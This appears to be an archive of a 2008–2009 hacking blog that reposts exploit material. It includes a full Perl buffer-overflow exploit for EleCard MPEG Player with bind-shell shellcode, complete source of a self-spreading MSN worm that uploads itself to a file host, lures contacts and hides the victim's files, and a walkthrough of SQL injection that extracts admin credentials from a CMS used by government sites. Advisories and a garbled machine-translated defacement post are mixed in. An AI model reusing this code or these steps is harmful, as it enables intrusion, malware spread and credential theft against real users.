· Websites and related web applications must be available 24 hours a
day, 7 days a week to provide the required service to customers,
employees, suppliers and other stakeholders.
· Firewalls and SSL provide no protection against web application
hacking, simply because access to the website has to be made
public.
· Web applications often have direct access to backend data such as
customer databases and, hence, control valuable data and are much
more difficult to secure.
· Most web applications are custom-made and, therefore, involve a
lesser degree of testing than off-the-shelf software. Consequently,
custom applications are more susceptible to attack.

Various high-profile hacking attacks have proven that web application
security remains the most critical. If your web applications are compromised,
hackers will have complete access to your backend data even though your
firewall is configured correctly and your operating system and applications
are patched repeatedly.
Network security defense provides no protection against web application
attacks since these are launched on port 80 (default for websites) which has
to remain open to allow regular operation of the business.
For the most comprehensive security strategy, it is therefore imperative that
you regularly and consistently audit your web applications for exploitable
vulnerabilities.

EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit

2009-01-26T10:38:00.001+07:00

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*************************************************\n";
print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area [NullArea.Net] *\n";
print " [X]**************************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows
Vista Ultimate English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".
"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".
"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".
"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open(blah, ">>$file") or die "Cannot open $file";
print blah $exploit;
close(blah);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";

reference
# milw0rm.com [2009-01-25]

Kaspersky Anti-Virus 2009

2009-01-05T22:36:00.001+07:00

Kaspersky Anti-Virus 2009 – the backbone of your PC’s security system, offering protection from a range of IT threats.

Kaspersky Anti-Virus 2009 provides the basic tools needed to protect your PC.
Download Kaspersky Anti-Virus 2009 brochure

more detail

Paros Proxy

2008-12-25T15:35:00.002+07:00

A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc. Download , Windows Installer

ref. parosproxy

SQL Injection Vulnerability

2008-12-25T15:24:00.002+07:00

Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc.

CVE Number: CVE-2008-1094
Vulnerability: SQL Injection
Risk: Medium
Attack vector: From Remote

Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008
Description

The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals‘ value.

/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)

An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query.

Original Advisory:

http://dcsl.ul.ie/advisories/02.htm

Barracuda Networks Technical Alert

http://www.barracudanetworks.com/ns/support/tech_alert.php

Affected Versions

Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)

Other products/versions might be affected.

Mitigation

Vendor recommends to the following firmware version

Barracuda Spam Firewall (Firmware v3.5.12.001)

Alternatively, please contact Barracuda Networks for technical support.

Credits

Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick

Disclaimer

Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory.

ref. milw0rm.com

PCMAV

2008-12-10T01:39:00.002+07:00

Following PCMAV or Software Anti nation child masterpiece virus
( Magazine PC Media) edition December 2008 or PCMAV version of 1.9.
Virus-Virus which is on edition before all still,
hopefully dgn this new edition can be dissipated. "
there is no antivirus other capable to overcome with complete of
computer virus, foreign and local good, which disseminating many in Indonesia as good as

ref and download

How To Hack or Deface Websites

2008-12-10T01:30:00.003+07:00

How To Hack or Deface Websites (APP IN DESCRIPTION)!!

ref.

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability

2008-12-01T16:37:00.003+07:00

SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.

- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode

php.ini:
safe_mode = On

and declaring via php_admin_flag

...
php_admin_flag safe_mode On

When we create some php script in /www/ and try call to:

ini_set("error_log", "/hack/");

or in /www/.htaccess

php_value error_log "/hack/bleh.php"

Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

It was for safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypass safe_mode.

example exploit:
error_log("", 0);

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not use safe_mode as a main safety.

--- 3. Greets ---
sp3x Infospec schain p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

# milw0rm.com [2008-11-20]

Hacking Friendster

2008-11-30T23:51:00.002+07:00

Watching, friendster hack tube

VB .Net Worm

2008-10-27T04:02:00.003+07:00

A basic MSN Messanger & ZIP/RAR Archive & MSN shares worm.. Don't try to spread it!
Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol

source code:

Imports MessengerAPI
Imports System.Diagnostics
Imports System.Reflection
Imports Microsoft.Win32
Imports System.IO
Imports System.Net
Imports System.Text

'A basic MSN Messanger & ZIP/RAR Archive & MSN shares worm.. Don't try to spread it!
'Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol

'''''''''''''''''''''''''''''''''
' Genetix {Doomriderz} '
' W32/Nurofen.worm '
' XMAS 2006 '
'''''''''''''''''''''''''''''''''

'1: adds to registry run key to start with windows "c:\MSNUpdate.exe".
'2: waits for msn to load by checking processes for "msnmsgr" then waits and checks to see if it's signed in and appear as online.
'3: uploads a copy of itself to the filesever with a random file name
'4: get's a random topic & gets all online contacts
'5: sends the random topic with the url to the worm download & url to DotNet framework 2.0 :p
'6: checks if the WinRar.exe exists by checking for the path in the registry
'7: searches for rar & zip files in it's folder and drops a copy of itself inside them
'8: Find MSN shared folders and copy as "Game.exe" to them.
'9: Kinda harmless payload that hides every file on the drive (attr +H)

'My worm will work depending on the follwoing reasons:
'1: The file server used dont change how it handles uploads
'2: You dont change the code and mess it all up!
'3: you have .net 2.0
'4: you have internet access
'4: its bug free (i think it is but report any bugs to me genetix [AT] phreaker [Dot] net
'5: If it dont work for people trying to spread it then I dont care! I hope it fails on you.
Public Class Form1
Private Const MAX_PATH As Integer = 260

'declare some API's / variables... ect that will be used globaly in this worm
Private Declare Auto Function GetShortPathName Lib "kernel32" ( _
ByVal lpszLongPath As String, _
ByVal lpszShortPath As System.Text.StringBuilder, _
ByVal cchBuffer As Integer) As Integer
Const DotNet As String = "http://MSDOTNET.notlong.com" 'short url to .net 2.0
Dim RarPath As String
Dim WormPath As String
Dim WormFile As String
Dim msn As New Messenger()
Dim Victims As IMessengerContacts
Dim Victim As IMessengerContact
Dim Worm As String
Dim url As String
Const KeyTitle As String = "MSNUpdate"
Const subkey As String = "Software\Microsoft\Windows\CurrentVersion\Run"

'This sub deals with calling other needed sub's/functions and is the main body
'of the contacts spreading.
Sub MSN_Worm()
On Error Resume Next
upload()
File.Delete(Worm)
Dim message(15) As String
Randomize()
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'some lame messages to fool the user into getting this worm.. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
message(1) = "New msn block checker 1.5 Download here: " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(2) = "MSN Block checker download " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(3) = "Working MSN block checker " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(4) = "Free MSN Add-ons limited! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(5) = "New MSN messanger 2007 " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(6) = "Find out who's blocked you! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(7) = "Download the new MSN block checker! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(8) = "Download the new MSN smilie kit! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(9) = "NEW MSN BLOCK CHECKER DOWNLOAD NOW! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(10) = "Download the new MSN bot it talks like a real person!! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(11) = "New MSN tool get it now! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(12) = "Download our new MSN block checker " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(13) = "Find out who is blocking you on MSN " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(14) = "This program can get your friends MSN passwords!! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(15) = "Find out your friends MSN passwords! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'okay so now it searches for online contacts and and opens a '
'a chat window to send its download link then closes the window.. '
'all done kinda reall fast '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Victims = msn.MyContacts
For Each Victim In Victims
If Victim.Status <> MISTATUS.MISTATUS_OFFLINE Then
If Victim.Blocked <> True Then
msn.InstantMessage(Victim.SigninName)
SendKeys.SendWait(message(Int(15 * Rnd()) + 1))
SendKeys.SendWait("{ENTER}")
SendKeys.SendWait("{ESC}")
End If
End If
Next

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'call sub to get WinRar from registry then check if it exist '
'if so, call the rar worm function (also for .zip) '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
RarPath = GetRarPath()
If File.Exists(RarPath) = True Then
RarWorm()
End If
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'call MSN shares spreading sub '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
MSN_Share_drop()
Randomize()

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'to check if payload should activate via random number comparing '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
If Int(200 * Rnd()) = 50 Then
payload()
End If

End Sub

Private Sub Timer_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer.Tick
On Error Resume Next
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'The worm need's to know when MSN starts/When its online/If its '
'already running ect.. this this timer deals with all that stuff '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Dim FindProcess As Process
For Each FindProcess In Process.GetProcesses(System.Environment.MachineName)
If (FindProcess.ToString().IndexOf("msnmsgr", 0) + 1) Then
If msn.MyStatus = MISTATUS.MISTATUS_ONLINE Then
Timer.Enabled = False
MSN_Worm()
End If
End If
Next FindProcess
End Sub

Sub upload()
On Error Resume Next
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Thx you retro soooo much~! most of this sub is all his code but i rewrote it in VB.net for this '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Well this is very kewl! it uploads itself to the file server and gets the link to download it
'thats all but It's good!
Dim pos As Integer
Dim pos2 As Integer
Dim sKey As String
Dim key As String
Dim boundary As String = Guid.NewGuid().ToString().Replace("-", "")
Dim fs As FileStream = File.OpenRead(Worm)
Dim bytes As Byte() = New Byte(fs.Length - 1) {}
fs.Read(bytes, 0, bytes.Length)
fs.Close()

Dim mimebody As String = "--" & _
boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""MAX_FILE_SIZE""" & _
Constants.vbCrLf & Constants.vbCrLf & "27000000" & Constants.vbCrLf & _
"--" & boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""page""" & _
Constants.vbCrLf & Constants.vbCrLf & "upload" & Constants.vbCrLf & _
"--" & boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""file""; filename=""" & _
Worm & """" & Constants.vbCrLf & "Content-Type: application/x-msdos-program" _
& Constants.vbCrLf & Constants.vbCrLf & Encoding.Default.GetString(bytes) & _
Constants.vbCrLf & "--" & boundary & "--" & Constants.vbCrLf

Dim buffer As Byte() = Encoding.Default.GetBytes(mimebody)
Dim request As HttpWebRequest = CType(WebRequest.Create("http://www5.upload2.net/upload.php"), HttpWebRequest)
request.Method = "POST"
request.ContentType = "multipart/form-data; charset=UTF-8; boundary=" & boundary
request.Accept = "text/xml,application/xml,application/xhtml+xml, " _
+ "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
request.Headers.Add("Accept-Encoding", "gzip,deflate")
request.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7")
request.ContentLength = buffer.Length
ServicePointManager.Expect100Continue = False
request.CookieContainer = New CookieContainer()
Dim srvStream As Stream = request.GetRequestStream()
srvStream.Write(buffer, 0, buffer.Length)
srvStream.Close()
Dim response As HttpWebResponse = CType(request.GetResponse(), HttpWebResponse)
Dim respURL As String = response.ResponseUri.ToString()

'I love playing with strings!
pos = (respURL.IndexOf("/id/", 0) + 1)
sKey = Mid(respURL, pos + 4, Len(respURL))
pos2 = (sKey.IndexOf("/pwd/", 0) + 1)
key = sKey.Substring(0, pos2 - 1)
url = "http://www.upload2.net/page/download/" + key + "/" + Worm + ".html"

End Sub

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Worm needs to know the current drive its on so this deals with it. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function CurDrive(ByVal arg As String)
On Error Resume Next
Dim dir As String, Pos As String
Pos = (arg.IndexOf("\", 0) + 1)
dir = arg.Substring(0, Val(Pos))
CurDrive = dir
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'payload that calls on other functions to get what it needs. '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub payload()
On Error Resume Next
Dim MyDir As DirectoryInfo
MyDir = New DirectoryInfo(WormPath)
GetDirs(MyDir)
End Sub

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'this kinda just installs the worm.. explains itself (like most of my code) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
Me.Visible = False
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
WormFile = (WormModule.FullyQualifiedName)
WormPath = (CurDrive(WormFile))
Dim NewValue As String = WormPath & "\WINDOWS\" & KeyTitle & ".exe"
If File.Exists(NewValue) = False Then
File.Copy(WormFile, NewValue)
End If
Worm = RndFileName() & ".exe"
If File.Exists(Worm) = False Then
File.Copy(WormFile, Worm)
End If

Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey(subkey, True)
key.SetValue(KeyTitle, NewValue)
End Sub

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'this is part of a recursive folder searching function '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub GetDirs(ByVal aDir As DirectoryInfo)
On Error Resume Next
Dim nextDir As DirectoryInfo
GetFiles(aDir)
For Each nextDir In aDir.GetDirectories
GetDirs(nextDir)
Next
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'same as above but for files.. they reply on eachother to work.. '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub GetFiles(ByVal aDir As DirectoryInfo)
On Error Resume Next
Dim aFile As FileInfo
For Each aFile In aDir.GetFiles()
File.SetAttributes(aFile.FullName, FileAttributes.Hidden)
Next
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'well i decided its better not to use a static name for uploading '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function RndFileName()
On Error Resume Next
Dim builder As New StringBuilder()
Dim random As New Random()
Dim cha As Char
Dim i As Integer
For i = 0 To 6
cha = Convert.ToChar(Convert.ToInt32((26 * random.NextDouble() + 65)))
builder.Append(cha)
Next
RndFileName = builder.ToString()
End Function
''''''''''''''''''''''''''''''''''''''''
'this sub is for zip/rar archive worm '
''''''''''''''''''''''''''''''''''''''''
Sub RarWorm()
On Error Resume Next
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
Dim WormFile As String = (WormModule.Name)
Dim FullName As String = (WormModule.FullyQualifiedName)
Dim WormPath As String = (WorkingFolder(FullName))
Dim i As Int32 = 0
Dim files() As String
Dim compile As String = ""
Dim ShrtPath As String = ""
Dim shrtWorm As String = 0
Dim ext As String = ""
files = System.IO.Directory.GetFiles(WormPath)

For i = 0 To files.GetUpperBound(0)
ext = Mid(files(i), Len(files(i)) - 3, Len(files(i)))
If ext = ".rar" Or ext = ".zip" Then
ShrtPath = GetShortFileName(files(i))
compile = RarPath & " a " & ShrtPath & Space(1) & WormFile
Shell(compile, AppWinStyle.Hide, True)
End If
Next
End Sub
'''''''''''''''''''''''''''''''''''
'here is the MSN shares worm sub '
'''''''''''''''''''''''''''''''''''
Sub MSN_Share_drop()
On Error Resume Next
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
Dim WormFile As String = (WormModule.FullyQualifiedName)
Dim FolPath As String = WormPath & "Documents and Settings\" & Environ("USERNAME") & "\Local Settings\Application Data\Microsoft\Messenger\"
If Dir(FolPath, FileAttribute.Directory) <> "" Then
Dim i As Int32 = 0
Dim x As Int32 = 0
Dim shares() As String
shares = System.IO.Directory.GetDirectories(FolPath)
For i = 0 To shares.GetUpperBound(0)
If Dir(shares(i), FileAttribute.Directory) <> "" Then
If File.Exists(shares(i) & "\Game.exe") = False Then
File.Copy(WormFile, shares(i) & "\Game.exe")
End If
End If
Next
End If
End Sub
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'the worm needs to know if and where WinRar is right? '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function GetRarPath() As String
On Error Resume Next
Dim myReg As RegistryKey
myReg = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe", False)
If Not myReg Is Nothing Then
GetRarPath = CStr(myReg.GetValue("Path")) & "\WinRar.exe"
End If
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Long path wont work with WinRar.exe because of the spaces so this function deals with it '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function GetShortFileName(ByVal LongPath As String) As String
On Error Resume Next
Dim ShortPath As New StringBuilder(MAX_PATH)
Dim BufferSize As Integer = GetShortPathName( _
LongPath, _
ShortPath, _
ShortPath.Capacity)

Return ShortPath.ToString()
End Function
'''''''''''''''''''''''''
'get current directory '
'''''''''''''''''''''''''
Function WorkingFolder(ByVal arg As String)
On Error Resume Next
Dim dir As String, Pos As String
Pos = InStrRev(arg, "\")
dir = Mid(arg, 1, Val(Pos))
WorkingFolder = dir
End Function

End Class

'Ok its messy! But I'm proud of it.

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change

2008-10-23T20:57:00.002+07:00

url: http://www.hummingbird.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net

This source was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Info:
DeployRun.dll <= 10.0.0.44

Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data

Vulnerable source method:
Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String)

Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

There are a lot of dangerous methods, just take a look and... good searching

source :

ref. milw0rm.com
regards,

DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability

2008-10-23T20:33:00.002+07:00

Portal Name: Dorsa CMS
Vendor : http://www.dorsacms.com
Description : A CMS written by iranian programmers which uses by governmental websites.
Vulnerable File : ShowPage.aspx
Dork: Powered by DorsaCms
Author : syst3m_f4ult && Y!ID : autumn_love6

How to exploit :

a live example :

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2

Testing injection :
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...

Getting table which contains Username and Password:
Easiest way is to search it:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--

table_name = Seller
Its not that table we are seeking, so we keep on:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--

Bingo
Table_name = USER_

Start to get username and pass from USER_:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))

user : admin
pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd

Update hash to a hash you know its decode and enjoy.

login to portal :
http://www.xxx.ir/Dorsapax/Signin.aspx

ref. milw0rm.com

regards,

Hacking Firefox

2008-10-20T13:43:00.003+07:00

Hacking Firefox source ( Deface all web which you visit) this title is taken let looked to be cool and very underground. If you wish defacing site with a purpose to so that seen cool your friends eye and don't wish to enter the prison because impinging UU ITE because your action, hence I will show its way of source. Again I emphasize this just for joke. Follow every stepnya and do, if you go out of each step which I inform the you have to responsible it self, and truely I will not hold responsible if happened something your. Usage of this information fully responsibility from your.
This technique only can be done with browser firefox constructively addon greasemonkey. Thus soon download firefox browser and grasemonkey. Link it in searching alone yes in uncle G source. Then Install Firefox if not yet owned it and say cheerio to IE ( sometime I still pake IE to hard appearance desain web which again in making). If firefox have diinstall his moment menginstall greasemonkey. Then kill browser firefox to be greasemonkey can active [moment you open browser firefox after him. If successful you installing greasemonkey icon be like this will appear in statusbar undercarriage.
